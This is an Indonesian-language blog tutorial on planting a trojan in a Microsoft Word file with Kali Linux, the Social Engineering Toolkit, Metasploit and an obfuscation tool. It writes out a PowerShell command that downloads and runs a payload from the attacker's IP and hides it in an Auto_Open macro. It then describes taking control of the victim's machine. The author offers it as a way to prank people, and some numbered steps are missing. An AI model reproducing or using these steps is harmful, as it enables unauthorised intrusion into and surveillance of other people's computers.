Haiii gaaaeeesss...
Dari artikel sebelumnya, kita tau apa itu Trojan dan Backdoors, dan bagaimana membuatnya pada pdf file. Nah di artikel ini, yang akan dibahas adalah bagaimana membuat trojan pada file Word atau pada doc file. Hal-hal penting yang diperlukan adalah :
1. Kali Linux 1.09a (dijalankan secara virtual pada Virtualbox)
2. Microsoft Word
3. Jaringan internet (Pastikan target dalam satu jaringan)
4. Metasploit Framework
5. Obfuscate.jar (program tambahan untuk membuat file terinfeksi trojan)
Obfuscate disini berguna untuk mengambil data dari server dan akan menyimpannya pada clipboard. Obfuscatre.jar disimpan pada sistem operasi yang sudah memiliki program Microsoft Word, agar mempermudah saat memindahkan trojan ke file yang sudah ada.
Okeee gaess.. langsung mulai ke tahap awal :
1. Buka Application > KaliLinux > Explotation Tools > Social Engineering Toolkit > Setoolkit
5. Lalu buka root untuk memindah file .txt yang sudah dibuat pada powershell dengan command tersebut. File dipindahkan atau diupload ke server. Kemudian service apache2 di start.
6. Aktifkan metasploit dengan command msfconsole. Command-command dibawahnya untuk membuka koneksi bagi target yang telah membuka file trojan.
7. Buka aplikasi Obfuscate.jar untuk mengambil script yang sudah dibuat dan di upload pada server.
Dan berikut merupakan command yang dimasukkan pada Obfuscate.jar. Command yang digunakan :
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))"
Jangan lupa mengubah IP 10.0.0.13 dengan IP dari pembuat trojan.
Setelah memasukkan Command dan mengubah IP, maka akan tampil script dari server dan akan otomatis tersimpan pada clipboard. Seperti gambar berikut:
9. Script akan dimasukkan pada macros yang ada di word yang telah disiapkan. Macros terdapat pada tab menu View.
10. Ketikkan Auto_Open pada textbox Macro Name. Lalu Pilih Document1 atau nama dokumen yang dibuat. Kemudian klik Create.
11. Lalu pada Macro windows yang terbuka, paste script yang sudah tercopy pada clipboard. Seperti berikut :
13. Sisipkan file word yang sudah terinfeksi pada desktop, agar mempermudah untuk dibuka.
14. Ketika Word sudah dibuka oleh target maka akan tampil pada Kali Linux IP dari target.
15. Kemudian kita dapat melihat data dari target dengan mengetik command sysinfo. Untuk mengetahui informasi dari sistem.
16. Jika IP sudah didapat, maka kita dapat melakukan remote desktop, atau screensoot dan lain-lain pada desktop target, dengan mengetahui segala command yang ada pada help command. Seperti screenshoot desktop target:
Yaa begitu kiranya gaess yang mau coba2 ngerjain orang dengan virus trojan, hihihi... Tapi langkah-langkah tersebut berhasil jika semua keamanan target tidak akti yaa gaess...
Sekiaaannn~~~